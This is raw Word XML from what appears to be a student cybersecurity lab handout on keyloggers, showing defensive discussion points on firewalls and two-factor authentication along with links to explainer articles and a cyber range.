              <w:t xml:space="preserve">If one site steals your password once, they're all the same...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Use a firewall!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Remember you disabled the firewall at the beginning of this lab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Firewalls prevent malicious software from sending out data without you knowing</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Two-Factor Authentication</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Why would these help secure your password?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">What are some other ways of defending against a keylogger attack?</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hyperlink r:id="rId7">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Artifacts and Links</w:t>
              </w:r>
            </w:hyperlink>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hyperlink r:id="rId8">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">U.S. Cyber Range</w:t>
              </w:r>
            </w:hyperlink>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Additional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9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">What are Keystroke Logging and Keyloggers?</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10">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">5 Ways to Protect Yourself Against Keyloggers</w:t>
              </w:r>
            </w:hyperlink>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Style w:val="Title"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="38761d"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1t3h5sf" w:id="0"/>
    <w:bookmarkEnd w:id="0"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="38761d"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:468.0pt;height:460.2644628099174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-919162</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-457199</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7777163" cy="866775"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="1459800" y="3272635"/>
                        <a:ext cx="7772400" cy="1014730"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="1323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-919162</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-457199</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7777163" cy="86677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777163" cy="8667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4991100</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-285749</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1876425" cy="523875"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr descr="Logo&#10;&#10;Description automatically generated" id="2" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="Logo&#10;&#10;Description automatically generated" id="0" name="image1.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:srcRect b="-20879" l="-2537" r="-8584" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1876425" cy="523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makeuseof.com/tag/4-ways-protect-keyloggers/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://usa.kaspersky.com/resource-center/definitions/keylogger" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.1.57.93:1717/gmail" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/drive/folders/1mNsCW5dRUiHjE_Zoi3p7YjO1RsRJFhVK?usp=share_link" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.uscyberrang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